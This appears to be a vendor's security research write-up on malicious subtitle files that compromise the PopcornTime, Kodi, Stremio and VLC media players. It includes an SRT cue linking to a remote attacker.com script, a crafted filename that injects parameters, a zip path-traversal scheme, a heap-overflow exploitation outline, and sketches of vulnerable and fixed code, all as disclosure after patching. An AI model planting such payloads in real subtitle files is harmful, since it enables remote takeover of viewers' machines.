Background
Recently, Check Point researchers revealed a brand new attack vector – attack by subtitles. As discussed in the previous post and in our demo, we showed how attackers can use subtitle files to take over users’ machines without being detected.
The attack vector entailed a number of vulnerabilities found in prominent streaming platforms, including VLC, Kodi (XBMC), PopcornTime and strem.io.
The potential damage an attacker could inflict is extensive, ranging from stealing sensitive information and installing ransomware to mass Denial of Service attacks, and much more.
After our original publication appeared, the vulnerabilities were fixed, which allows us to tell the full tale and share the technical details of the attack.
PopcornTime
Developed as an open source project in just a couple of weeks, the multi-platform “Netflix for pirates” integrated the deadly combination of a BitTorrent client, a video player, and endless scraping capabilities under a very friendly graphical user interface.
Gaining massive popularity and plenty of attention from mainstream media ([1], [2]) for its ease-of-use and vast movie collection, the program was abruptly taken down due to pressure from the Motion Picture Association Of America.
After its discontinuation, the PopcornTime application was forked by various different groups to maintain the program and develop new features. Members of the original PopcornTime project announced that they would endorse the popcorntime.io (that meanwhile turned into popcorntime.sh) project as the successor to the original discontinued Popcorn Time.
The webkit powered interface is packed with movie information and metadata. It presents trailers, plot summaries, cast information, cover photos, IMDB ratings and much more.
Subtitles in PopcornTime
To make the user’s life even easier, subtitles are fetched automatically. Can this behavior be exploited? (Hint: Yes)
Behind the scenes, PopcornTime uses OpenSubtitles as its sole subtitle provider. With over 4,000,000 entries and a very convenient API, it is an extremely popular repository.
This API not only allows for easy search and download of subtitles, but it also has a recommendation algorithm to help you find the right file for your movie and release.
Attack Surface
As mentioned earlier, PopcornTime is webkit based, NW.js to be exact.
Previously known as node-webkit, the NW.js platform lets developers use web technologies such as HTML5, CSS3 and WebGL in native applications.
Moreover, the Node.js API and 3rd party modules can be directly called from the DOM.
Essentially, an NW.js application is a web page for all intents and purposes: all code is written in JavaScript or HTML and styled with CSS. Like any web page, it may be vulnerable to an XSS attack. In this case, because the page runs on a Node.js engine, XSS gives the attacker access to server-side capabilities. In other words, XSS is actually RCE.
Ready… Set… Go!
Our journey begins as soon as the user starts playing a movie.
PopcornTime issues a query using the previously mentioned API and downloads the recommended subtitle (we will dive deeper into that process later on, as it turns out to be a key step in our striving for world domination).
Next, PopcornTime tries to transcode the file into the .srt format:
After various decoding and parsing functions, the created element (a single subtitle) is appended to the display at the right time, using the “cues” array:
This enables us to add any html object to the view.
Obviously, a complete control over any HTML element is dangerous by itself. However, when dealing with node based applications, it is important to understand that XSS equals RCE.
System commands can be easily executed using modules such as child_process.
Once our unsanitized JavaScript is loaded to the display, code execution is just a few lines away.
A basic SRT file looks something like this:
1
00:00:01,000 --> 00:00:05,000
Hello World
Instead of the “Hello World” text, we can use an HTML tag – the image tag.
We try to load a nonexistent image and provide it with the onerror attribute.
As seen in Figure 4, we use the onerror attribute JavaScript capabilities to remove the revealing icon of the broken image and append our malicious remote payload to the page. Needless to say, evil.js (Figure 5) will pop the traditional calc.exe.
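To make the root cause concrete, here is a minimal Python sketch of a renderer that parses an SRT cue and inserts its text into markup. It is not PopcornTime's code (which is JavaScript); parse_srt, render_unsafe and render_escaped are hypothetical names chosen for this illustration. The only point is that cue text treated as markup becomes a live element, while cue text that is escaped first stays inert.

```python
import html
import re


def parse_srt(text):
    """Parse SRT text into a list of cue dicts (simplified, illustrative parser)."""
    cues = []
    normalized = text.replace("\r\n", "\n").strip()
    for block in re.split(r"\n\s*\n", normalized):
        lines = block.split("\n")
        # A cue needs an index line, a timing line and at least one text line.
        if len(lines) < 3 or "-->" not in lines[1]:
            continue
        start, end = (part.strip() for part in lines[1].split("-->", 1))
        cues.append({"start": start, "end": end, "text": "\n".join(lines[2:])})
    return cues


def render_unsafe(cue):
    # Cue text is trusted as markup: any tag inside it becomes a real element.
    return '<div class="cue">' + cue["text"] + "</div>"


def render_escaped(cue):
    # Cue text is treated as data: markup characters are escaped before display.
    return '<div class="cue">' + html.escape(cue["text"]) + "</div>"


# A cue whose "text" is an image tag with an error handler (harmless alert here).
SAMPLE = (
    "1\n"
    "00:00:01,000 --> 00:00:05,000\n"
    '<img src="missing.png" onerror="alert(1)">\n'
)

cue = parse_srt(SAMPLE)[0]
```

With this sample, render_unsafe(cue) still contains the raw img tag, while render_escaped(cue) contains only its escaped text form.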
OpenSubtitles – The Watering Hole
So we can execute code on PopcornTime.
Client-side vulnerabilities are valuable, but they tend to rely on some user interaction.
For successful exploitation to occur, a link has to be clicked, a pdf must be read, or a site needs to be hacked.
In the case of subtitles, the user needs to load the malicious subtitles. Can we somehow omit this step?
We all know that subtitles are carelessly fetched from open communities around the internet and treated as harmless text files. So after we proved these files can be dangerous, we took a step back and looked at the bigger picture.
With over 4,000,000 entries and an average of 5,000,000 daily downloads, OpenSubtitles is the largest online community for subtitles.
Their extensive API is also widely integrated into many other video players.
They even offer a smart search capability which is a chained function that returns the best matching subtitles based on the information you provide.
The question remains: Can we manipulate this API to eliminate any user interaction and make sure a malicious subtitle stored on OpenSubtitles is the one automatically downloaded?
API Drill Down
When a user starts playing a movie, a SearchSubtitles request is immediately sent, resulting in an XML containing all the subtitle objects that match our criteria (IMDBid).
In figure 6, we see the search criteria is “imdbid”, and the response in figure 7 contains all subtitles matched by imdbid.
Now comes the interesting part, as the API has an algorithm that ranks subtitles based on their filename, IMDBid, uploader rank, etc.
Skimming through the documentation, we discovered this ranking scheme:
In figure 8, we see how many points are added to the subtitles ranking, based on the matching criteria, such as: tag, IMDBid, uploading user, etc.
According to the chart, assuming we (as “user|anon”) upload our malicious subtitles to OpenSubtitles, our subtitles will only get 5 points.
But here we learned a valuable lesson: reading the documentation is not enough, as the source code revealed an undocumented behavior.
The matchTags function:
The request sent by PopcornTime specified only IMDBid (as seen in figure 6), which means that the condition of MatchedBy === ‘tag’ will forever be false.
This calls the function matchTags():
The matchTags function breaks down the filename of the movie and the subtitle to tags.
A tag is basically an isolated word or number found in the file name, and these are usually separated by dots (“.”) and dashes (“-”).
The number of tags shared between the movie file name and the subtitle file name is then divided by the number of movie tags and multiplied by a maxScore of 7, which is the score assigned when the two file names match completely.
For example, if the movie file name is “Trolls.2016.BDRip.x264-[YTS.AG].mp4”, the tags are the following list:
[Trolls, 2016, BDRip, x264, YTS, AG, mp4]
The name of the movie file that the application (e.g. PopcornTime) downloads can easily be discovered with a sniffer, so we can give our subtitle file exactly the same name, ending with the “srt” extension instead – rewarding the subtitle’s rank with an extra 7 points (!).
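The tag-matching arithmetic described above can be sketched in a few lines of Python. This is an illustration of the formula only, not the API's source: the function names are hypothetical, tags are taken to be runs of letters and digits, and the sketch drops the file extension before tokenizing, an assumption made here so that a subtitle named after the movie file reaches the full score.

```python
import os
import re

MAX_SCORE = 7  # maximum tag-match bonus, as described in the text


def tags(filename):
    """Split a file name into tags (runs of letters and digits).

    Assumption of this sketch: the extension is removed first.
    """
    stem, _extension = os.path.splitext(filename)
    return re.findall(r"[A-Za-z0-9]+", stem)


def tag_score(movie_filename, subtitle_filename, max_score=MAX_SCORE):
    """Shared tags divided by the number of movie tags, scaled to max_score."""
    movie_tags = tags(movie_filename)
    if not movie_tags:
        return 0.0
    subtitle_tags = set(tags(subtitle_filename))
    shared = sum(1 for tag in movie_tags if tag in subtitle_tags)
    return shared / len(movie_tags) * max_score


MOVIE = "Trolls.2016.BDRip.x264-[YTS.AG].mp4"

# Same release name with an .srt extension: every movie tag is matched.
full = tag_score(MOVIE, "Trolls.2016.BDRip.x264-[YTS.AG].srt")

# A generic name shares only two of the six tags, so it earns a fraction.
partial = tag_score(MOVIE, "Trolls.2016.srt")
```

Under these assumptions the copied release name earns the full 7 points, while the generic name earns about 2.3, which is why knowing the exact release file name matters.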
Quick Recap
Putting it all together, we can confidently achieve a score of 12. The match of IMDBid is trivial (+5), and knowing the specific release used by torrent sites and PopcornTime is as easy as opening a packet sniffer. So we can make the malicious subtitles result in full compatibility (+7).
This is a fairly good score but we are still not satisfied.
These are the recommended subtitle scores for some of the most popular content available on-line: Snowden, Deadpool, Inception, Rogue One: A Star Wars Story and Frozen:
These graphs (figure 11) show the score for the 7 most popular languages in the world, and display their average and highest score. Skimming automatically through a bunch of popular subtitles, we noticed that the highest score a subtitle got is 14, while the average is around 10.
Reviewing the scoring system once more, we realized we can move up in the ranks quite easily.
Apparently all it takes is 101 subtitle uploads to be a gold member.
So we signed up to OpenSubtitles, and 4 minutes and 40 lines of Python later, we were golden.
We wrote a small script that shows all available subtitles for a given movie. In the following image, you can see that our subtitles had the highest score of 15 (!):
What this basically means is, given any movie, we can force the player to load our crafted malicious subtitles and exploit the machine.
KODI
KODI, formerly known as XBMC, is an award winning open-source, cross-platform media player and entertainment hub. Available on all major platforms (Windows, Linux, Mac, iOS and Android) and in 72 languages, and used by over 40 million people, it is probably the most commonly used Media Center software around. KODI is also commonly paired with Smart TVs and Raspberry Pis, making it interesting from the attackers’ perspective.
Subtitles in KODI
Like many other KODI features, subtitles are managed by Python plugins.
The most common subtitle plugin is Open-Subtitles, and as we are already familiar with their API, let’s dive right in to the subtitles download process.
The plugin searches for subtitles using the following function:
searchsubtitles() retrieves a list of subtitles, including their metadata, from OpenSubtitles.
A for loop iterates over these subtitles and adds them using addDirectoryItem() to the GUI as shown below:
As you can see in figure 15, the string sent to addDirectoryItem() is:
plugin://%s/?action=download&link=%s&ID=%s&filename=%s&format=%s
As Open-Subtitles is, well, open, an attacker has control over the filename parameter received under the value of SubFileName as seen below.
Given the fact that the filename is completely controlled by an attacker, it is also possible to overwrite the previous parameters such as link and ID by uploading a file named:
Subtitles.srt&link=<controlled>&ID=<controlled>
Which results in the following string:
plugin://%s/?action=download&link=%s&ID=%s&filename=Subtitles.srt&link=<controlled>&ID=<controlled>&format=%s
This overwrite is possible due to the use of a basic split function when parsing the string.
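The effect of split-based parsing can be reproduced with a short Python sketch. It is not the plugin's code: build_url, naive_params, the plugin id and the example.* hosts are hypothetical. It only shows that when a query string is split on “&” and “=” and stored in a dictionary, a later duplicate key silently replaces the earlier one, and that percent-encoding the file name before building the URL keeps the original values intact.

```python
from urllib.parse import quote

TEMPLATE = (
    "plugin://{plugin}/?action=download&link={link}"
    "&ID={sub_id}&filename={filename}&format={fmt}"
)


def build_url(filename, quote_values=False):
    """Build the menu item URL; values other than filename are fixed placeholders."""
    if quote_values:
        # Percent-encode '&' and '=' so the file name cannot add parameters.
        filename = quote(filename, safe="")
    return TEMPLATE.format(
        plugin="service.subtitles.example",   # hypothetical plugin id
        link="http://legit.example/sub.zip",  # hypothetical legitimate link
        sub_id="12345",
        filename=filename,
        fmt="srt",
    )


def naive_params(url):
    """Parse the query string with plain splits, as a simple parser might."""
    query = url.split("?", 1)[1]
    params = {}
    for pair in query.split("&"):
        parts = pair.split("=")
        if len(parts) == 2:
            params[parts[0]] = parts[1]  # a later duplicate key wins
    return params


EVIL_NAME = "Subtitles.srt&link=http://attacker.example/evil.zip&ID=-1"

tampered = naive_params(build_url(EVIL_NAME))
protected = naive_params(build_url(EVIL_NAME, quote_values=True))
```

In the tampered case, link and ID come from the attacker-supplied file name; in the protected case they keep the values the plugin intended.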
Both of these tampered parameters are crucial for the function that runs after the user selects one of the options available in the subtitle menu (as seen in figure 16).
Once the user chooses an item from the subtitles menu, it is sent to Download():
Now that we control all the parameters passed to it, we can abuse its functionality.
By providing an invalid id (like “-1”), we reach the “if not result” branch. This branch is supposed to download “raw” archives in case the Open-Subtitles API fails to fetch the necessary file.
With the url parameter at our disposal, we can make it download any zip file that we wish (such as http://attacker.com/evil.zip).
Downloading an arbitrary zip archive from the internet is careless, but chaining this behavior with another vulnerability found in KODI’s built-in extraction makes it lethal.
Auditing ExtractArchive(), we noticed it concatenates strPath (the extraction destination path) with strFilePath (the file path inside the archive as yielded by the iterator).
Constructing a zip containing folders named “..” recursively allowed us to control the extraction destination path (CVE-2017-8314).
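The directory traversal can be illustrated with plain path arithmetic. The Python sketch below is not KODI's extraction code; the function names and paths are hypothetical. It contrasts naive concatenation of the destination directory and the archive member name with a variant that resolves the result and rejects anything that leaves the destination.

```python
import posixpath


def naive_destination(dest_dir, member_name):
    """Concatenate the extraction directory and the member name as-is.

    normpath is applied only to show where the operating system would end up
    once it resolves the ".." components.
    """
    return posixpath.normpath(dest_dir + "/" + member_name)


def safe_destination(dest_dir, member_name):
    """Resolve the member path and refuse anything outside dest_dir."""
    root = posixpath.normpath(dest_dir)
    target = posixpath.normpath(posixpath.join(root, member_name))
    if target != root and not target.startswith(root + "/"):
        raise ValueError("archive member escapes extraction directory: " + member_name)
    return target


# Hypothetical paths, for illustration only.
DEST = "/home/user/.kodi/temp"
EVIL_MEMBER = "../addons/service.subtitles.example/service.py"

escaped_path = naive_destination(DEST, EVIL_MEMBER)
```

Here escaped_path lands in a sibling directory of the intended destination, while safe_destination(DEST, EVIL_MEMBER) raises ValueError and an ordinary member such as "sub/movie.srt" is still accepted.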
Using this directory traversal weakness, we overwrote KODI’s own subtitle plugin.
Overwriting the plugin means that KODI will soon execute our file. Our malicious Python code can be an exact duplicate of the original plugin, with the addition of any desired malicious behavior.
Stremio
PopcornTime definitely marked the rise of streaming apps, but when it was abruptly shut down by the MPAA, users were left looking for alternatives.
Stremio, a semi-open source content aggregator, offered just that. Like PopcornTime, it is designed with ease of use in mind and has a similar user interface. Interestingly enough, Stremio shares a few characteristics with PopcornTime under the hood as well. Most importantly for us, it is a web-kit based application that uses OpenSubtitles.org as its subtitle provider.
Strem.IO also adds the subtitles content to the webkit interface, so we assumed XSS would be a good direction here as well.
However, trying the same technique that worked on PopcornTime failed:
We can see the broken image at the bottom (Figure 21), but no code was executed.
Apparently, our JavaScript has been sanitized. It was time to dig a little deeper.
Stremio code is archived as an ASAR file, a simple TAR like format that concatenates all files together without the compression. Extracting the source code and prettifying it, we realized that any text added to the screen is passed through Angular-Sanitize.
The sanitize service will parse an HTML and only allow safe and white-listed markup and attributes to survive, thus sterilizing a string so it contains no scripting expressions or dangerous attributes. Being forced to use only static HTML tags with no scripting capabilities really limited our options. The situation called for a creative solution.
If you ever used Stremio, you are probably familiar with their “Support us” pop up banner.
Using the HTML <img> tag, we were able to present an exact copy of that banner right in the middle of the screen. Wrapping it with an <a href> tag meant that clicking the close button redirects this web-kit instance to our unsanitized page:
1
00:00:01,000 --> 00:01:00,000
<a href="http://attacker.com/evil.js"><img src="http://attacker.com/support.jpg"></a>
That page is exactly the same as the evil.js in the PopcornTime attack, which utilized the nodejs capabilities to execute code on the victim’s machine.
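Why the onerror trick fails while the link trick still works can be shown with a toy whitelist sanitizer. The Python sketch below is not Angular-Sanitize and does not claim to mirror its rules; the ALLOWED table and class name are assumptions made for illustration. It keeps a small set of tags and attributes and drops everything else, so event handlers disappear but a plain link wrapped around an image survives.

```python
from html import escape
from html.parser import HTMLParser

# Hypothetical whitelist: tag name -> attributes allowed on that tag.
ALLOWED = {"a": {"href"}, "img": {"src"}, "b": set(), "i": set()}


class WhitelistSanitizer(HTMLParser):
    """Rebuild markup from whitelisted tags and attributes only."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED:
            return  # unknown tags (e.g. script) are dropped
        kept = [(k, v) for k, v in attrs if k in ALLOWED[tag] and v is not None]
        rendered = "".join(' {}="{}"'.format(k, escape(v, quote=True)) for k, v in kept)
        self.out.append("<{}{}>".format(tag, rendered))

    def handle_endtag(self, tag):
        if tag in ALLOWED and tag != "img":  # img has no closing tag
            self.out.append("</{}>".format(tag))

    def handle_data(self, data):
        self.out.append(escape(data))


def sanitize(markup):
    parser = WhitelistSanitizer()
    parser.feed(markup)
    parser.close()
    return "".join(parser.out)


handler_attempt = sanitize('<img src="x" onerror="alert(1)">')
link_attempt = sanitize(
    '<a href="http://attacker.example/page">'
    '<img src="http://attacker.example/banner.jpg"></a>'
)
```

The first input loses its onerror attribute, while the second passes through unchanged: static markup is all a sanitizer of this kind allows, and static markup is all the fake banner needs. Note that this toy version does not inspect URL schemes, which a real sanitizer would also have to do.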
VLC – The Obvious Target
Introduction
Once we realized the disastrous potential of subtitles as an attack vector, our next target was obvious. With over 180,000,000 users, VLC is one of the most popular media players out there.
This open-source, portable, cross-platform media player/streamer is available for almost any platform imaginable: Windows, OS X, Linux, Windows Phone, Android, Tizen and iOS. It is practically everywhere.
Described by its own authors as a “very popular, but quite large and complex piece of software”, we were confident subtitles-related vulnerabilities exist here as well.
Design
VLC is, in fact, a complete multimedia framework (like DirectShow or GStreamer) where you can load and plug-in many modules dynamically.
The core framework does the “wiring” and the media processing, from input (files, network streams) to output (audio or video, on a screen or a network). It uses modules to do most of the work at every stage (various demuxers, decoders, filters and outputs)
Below is a chart that represents the principal module capabilities implemented in VLC:
Subtitles
Maybe this would be a good time to take a short break from VLC and discuss the complete chaos that is the world of subtitles formats.
During our research we encountered more than 25 (!) subtitle formats. Some are binary, some are textual, and only a few are well documented.
It is common knowledge that SRT supports a limited set of HTML tags and attributes, but we were quite surprised to learn about other exotic functionalities offered by various formats. SAMI subtitles, for example, allow for embedded images. SSA supports the definition of multiple themes/styles that can then be referenced from each subtitle. ASS even allows binary font embedding. The list goes on and on.
Usually there are no libraries to parse all these formats, which leaves the task to each and every developer. Inevitably, things go wrong.
Back to VLC
Textual subtitles are parsed by VLC in its demuxer called subtitle.c.
Below are all the formats it supports and their parsing functions.
The demuxers’ only job is to parse the different timing conventions of each of the formats and send every subtitle to its decoder. Other than SSA and ASS that are decoded by the open-source library libass, all these formats are sent to VLC’s own decoder subsdec.c.
subsdec.c parses the text field of every subtitle and creates two versions of it. The first is a plain text version with all tags, attributes and styling stripped off.
This is used in case later rendering fails.
The second, more feature-rich version is referred to as the HTMLsubtitle. HTML subtitles contain all the fancy styling attributes such as fonts, alignment etc.
After they are decoded, subtitles are sent to the final stage of rendering. Text rendering is mostly done using the freetype library.
That pretty much sums up the life span of a subtitle from load to display.
Bug Hunting
Going over the VLC subtitle related code, we immediately noticed a lot of parsing is done using raw pointers instead of built-in string functions. This is generally a bad idea.
For example, while consuming the possible attributes of a font tag, such as family, size or color, VLC fails to validate the end of the string in some places. The decoder will continue reading from the buffer until a ‘>’ is met, skipping any Null terminator. (CVE-2017-8310)
Fuzzing
While auditing the code manually, we also started fuzzing VLC for subtitles related vulnerabilities.
Our weapon of choice was the brilliant AFL. This security-oriented fuzzer employs compile-time instrumentation and genetic algorithms to discover new internal states and trigger edge cases in the targeted binary. AFL has already found countless bugs, and given the right corpus, it is capable of providing very interesting test cases in a fairly short time.
For our corpus, we downloaded and rewrote several subtitle files with different functionalities in various formats.
To avoid the rendering and display of the video (our fuzzing server did not have any graphical interface), we used the transcode functionality to convert a short movie containing nothing but black screen from one codec to another.
This is the command we used to run AFL:
./afl-fuzz -t 600000 -m 2048 -i input/ -o output/ -S "fuzzer$(date +%s)" -x subtitles.dict -- ~/sources/vlc-2.2-afl/bin/vlc-static -q -I dummy -subfile @@ -sout='#transcode{vcodec="x264",soverlay="true"}:standard{access="file",mux="avi",dst="/dev/null"}' ./input.mp4 vlc://quit
The Victim
It didn’t take AFL long to find a vulnerable function: ParseJSS. JSS stands for JACO Sub Script files. JACOsub is a very flexible format allowing for timing manipulations (like shifts), inclusion of external JACOsub files, clock pauses and many other tricks that can be found in its full specification.
JACO script relies heavily on directives. A directive is a series of character codes strung together. They determine a subtitle’s position, font, style, color, and so forth. Directives affect only the single subtitle to which they are prepended.
The crash found by AFL was due to an out-of-bound read while trying to skip unsupported directives (a functionality which is not fully implemented yet) – CVE-2017-8313.
In case a directive is written without any following spaces, this while loop will skip the Null byte terminating psz_text over-running the buffer. Here, and throughout the code, psz_text is a pointer to a Null terminated string allocated on the heap.
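The over-read pattern described here can be modeled in Python by treating a bytes object as a stretch of heap memory. This is a simplified model, not VLC's C code: the function names and buffer contents are invented for illustration. The first scanner only stops at a space, so it walks past the terminator into whatever follows; the second also stops at the terminating zero byte.

```python
SPACE = ord(" ")
NUL = 0


def skip_directive_unchecked(memory, pos):
    """Advance until a space is found, ignoring the NUL terminator (buggy pattern)."""
    while memory[pos] != SPACE:
        pos += 1
    return pos


def skip_directive_checked(memory, pos):
    """Advance until a space or the NUL terminator, whichever comes first."""
    while memory[pos] not in (SPACE, NUL):
        pos += 1
    return pos


# Model of adjacent heap memory: a NUL-terminated subtitle string followed by
# bytes that belong to a neighbouring allocation.
subtitle = b"DIRECTIVE\x00"
neighbour = b"other object\x00"
memory = subtitle + neighbour

terminator = memory.index(NUL)  # end of the subtitle string
unchecked_stop = skip_directive_unchecked(memory, 0)
checked_stop = skip_directive_checked(memory, 0)
```

In this model unchecked_stop lies beyond terminator, inside the neighbouring data, while checked_stop equals terminator. In C there is no bounds error to stop the scan, so the read simply continues through adjacent heap memory.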
This drew our attention to the ParseJSS function and we soon manually found another two out-of-bound read issues in the parsing of other directives. This time, it was the parsing of shift and time directives (cases ‘S’ and ‘T’ respectively). This happens due to the fact that the shift can be greater than the psz_text length (CVE-2017-8312).
The aforementioned VLC vulnerabilities, while enabling attackers to crash the program, weren’t sufficient for us. We were after code execution, and for that we needed a vulnerability which enables an attacker to write some data. We continued reading the ParseJSS function and looked at other directives.
The C[olor] and F[ont] directives granted us some more powerful primitives. Due to a faulty double increment, we were able to skip the delimiting Null byte and write outside the buffer. This heap based overflow allowed us to ultimately execute arbitrary code (CVE-2017-8311).
In another case, VLC intentionally skips the Null byte (line 1883).
This behavior resulted in a heap buffer overflow as well.
Exploitation
VLC supports many platforms – OSs and hardware architectures. Each platform may have some different characteristics and heap implementation details that affect the exploitation. From pointer sizes to caching, everything matters.
In our PoC, we decided to exploit Ubuntu 16.04 x86_64. As it is a modern and popular platform, the PoC demonstrates that the attack is applicable to the real world. Having an open-source implementation of the heap lets us understand and explain the exploitation process in great detail.
There are a (very) few general purpose heap exploitation techniques for GLibC-malloc that survived through the years. However, the conditions in which this vulnerability happens prevent us from using any of these methods.
Our only option is to use the vulnerability as a write primitive to overwrite some application specific data. This overwritten data, in turn, will either lead to stronger primitives (write what where) or complete control over code execution.
VLC is a highly threaded application, and due to the implementation of the heap, every thread has its own heap arena. This limits the objects we may overwrite to those allocated in the thread that handles subtitles. Also, it’s much more likely we can overflow an object that is allocated in the vicinity of the code used to trigger the vulnerability (or used for Feng Shui; more on that later).
The code that runs between the creation of our thread and the vulnerable function is not too long. We manually started looking for objects that seem useful and came up with demux_sys_t and variable_t. By automatically tracking every allocated object on the heap, we also found link_map, es_out_id_t and some Qt objects which had virtual tables in them. By process of elimination, we eventually picked the variable_t object to be the victim.
This object is used for holding data of various types within the VLC application, including the module’s configuration values and command line options. There are plenty of them all over, which increases our chances of manipulating the heap to have a free slot before one of them. The variable_t struct has a p_ops field which holds a pointer to an array of function pointers that operate on the value of the variable. Controlling this field enables an attacker to gain control over the program. Other objects were either not exploitable or posed too many restrictions.
Now that we have a victim object, we must ensure we can allocate a JACOSubScript (JSS) subtitle before it. This process of manipulating the heap into a predictable and useful state is called Heap Feng Shui (a.k.a. Heap-Fu or Grooming). Fortunately, we were quite lucky this time. By mere chance, we happened to have a hole right before a victim object, the variable_t for “sub-fps”.
Even though we didn’t have to use any other heap shaping primitive, we did find a very promising and interesting code flow which can be of great aid, in case a more subtle design is required. When opening a subtitles file, VLC doesn’t know which module to use for parsing the new file. VLC’s architecture is very modular, and when parsing a file, it looks at all its modules (libraries), loads them and checks whether they know how to parse the given stream (in this case, file). The vulnerable code resides in the subtitle module, but it’s not the first module loaded. Two modules earlier, the VobSub module is loaded and checks whether the subtitles are of VobSub format. We can trick this module to think our file is actually a VobSub file by putting the VobSub magic constant in the first line. Then, this module starts parsing the file, making various allocations and de-allocations. This code runs before allocating the victim object. So this nice VobSub/JSS polyglot can be used for Feng Shui.
The vulnerability enabled us to linearly overwrite data after an allocated subtitle string. This posed a major problem: the variable_t struct’s first field is psz_name, which is assumed to be a pointer to a string. This pointer is dereferenced a few times in the life-cycle of VLC. As the ParseJSS function copies strings, we can’t write NULL bytes, which are the top two bytes of a valid pointer. Therefore, we can’t write valid pointers and must not overflow naively into the variable_t struct. To overcome this problem, we abused the heap’s metadata. We used a complex series of allocation-overflow-deallocation sequences and overwrote chunks’ size metadata (“The poisoned NULL byte, 2014 edition” style). This enabled us to overwrite the p_ops field in the variable_t structure without overwriting the psz_name field.
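The NULL byte constraint is easy to see by looking at how a 64-bit pointer is laid out in memory. The Python sketch below uses a made-up user-space address and a simplified model of a C string copy (strcpy_model is a hypothetical helper, not a real API): on x86_64 the two most significant bytes of such a pointer are zero, and a string copy stops at the first zero byte it meets.

```python
import struct


def pack_pointer(address):
    """Return the 8 bytes of a 64-bit pointer as stored in little-endian memory."""
    return struct.pack("<Q", address)


def strcpy_model(source):
    """Return the payload bytes a C-style string copy would transfer.

    Everything before the first zero byte is copied; the copy then ends
    (a real strcpy also writes one terminating zero byte).
    """
    end = source.find(b"\x00")
    return source if end == -1 else source[:end]


EXAMPLE_ADDRESS = 0x00007F3A12345678  # hypothetical user-space heap address

raw = pack_pointer(EXAMPLE_ADDRESS)
copied = strcpy_model(raw)
```

Only the six low bytes of the pointer are transferred before the copy stops, so a complete pointer value followed by more attacker data cannot be delivered through a string copy. That is the reason for the detour through the heap metadata.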
Now, we find ourselves facing the eternal question, what should we write? The p_ops field is used in the Destroy function, when closing VLC. The code invokes the pf_free function in the array pointed to by this field and passes the value as a parameter. So we need to put a pointer to a pointer to our first gadget (actually, 16 bytes before). Our main problem here is ASLR. We don’t know where anything is. Welcome to the hellish world of scriptless exploitation.
One way to overcome this problem is partial overwrite. The original pointer points to the float_ops static array in the libvlccore library. We can partially overwrite this value and make it point somewhere else within this library.
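A partial overwrite can be pictured as replacing only the lowest bytes of a little-endian pointer. The Python sketch below uses a made-up address and a hypothetical helper, partial_overwrite, and is meant purely as an illustration of the idea: the high bytes, which carry the randomized library base, are left untouched, so the new value still points into the same region as the original.

```python
import struct


def partial_overwrite(original, low_bytes):
    """Replace the lowest len(low_bytes) bytes of a little-endian 64-bit pointer."""
    raw = bytearray(struct.pack("<Q", original))
    raw[: len(low_bytes)] = low_bytes
    return struct.unpack("<Q", bytes(raw))[0]


ORIGINAL = 0x00007F3A12345678  # hypothetical address inside a loaded library

# Overwrite only the two least significant bytes (stored first in memory).
redirected = partial_overwrite(ORIGINAL, b"\xef\xbe")
```

In this example the pointer becomes 0x7F3A1234BEEF: everything above the low 16 bits is inherited from the original value, which is what makes the technique usable without knowing the full randomized address.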
Another viable option is to point to the main binary which, in Ubuntu, is not randomized. We found some very interesting gadgets in the main binary. For example, a gadget that invokes dlsym and then invokes the result with another register as first argument (in code: dlsym(-1, $rsi)($rbx)).
A third way to overcome this problem is to make a partial copy. As our vulnerability copies from beyond a chunk boundary, we can manipulate the heap to write a heap pointer in the chunk and then partially copy it.
While these options seem very promising, we didn’t follow this road. Scriptless exploitation poses many challenges, and it is too much to investigate for the sake of a demo. Instead, we disabled the ASLR and pointed to our heap. The address of the arena changed a little, most likely depending on the threading behavior, but it was statistically fine to assume it will be in a certain address. Our next question is, where within the arena should we point to? VLC reads the subtitles file line by line and copies each line to a chunk on the heap. The low-level line reading mechanism poses a synthetic limit on the line’s size of 204800 bytes.
We put our data in the longest allowed line and found out where it is statistically. We built a ROP chain based on libvlccore and put a nice long sled in the beginning. Then, we roughly pointed the p_ops field to our sled and launched VLC with our subtitles file. Lo and behold, a gnome-calculator popped up.
Summary
We showed that by using various vulnerabilities, we could exploit the most popular streaming platforms and take over the victims’ machines. The vulnerability types ranged from simple XSS, through logical bugs, up to memory corruptions.
Being extremely widespread, these media players (and we believe others as well) provide a vast attack surface, potentially affecting hundreds of millions of users.
The main lesson learned is that even overlooked areas, however benign they may seem, can be taken advantage of by attackers looking for a way into your system. We will continue to look for and understand how these breaches can be exploited, and protect users against attackers.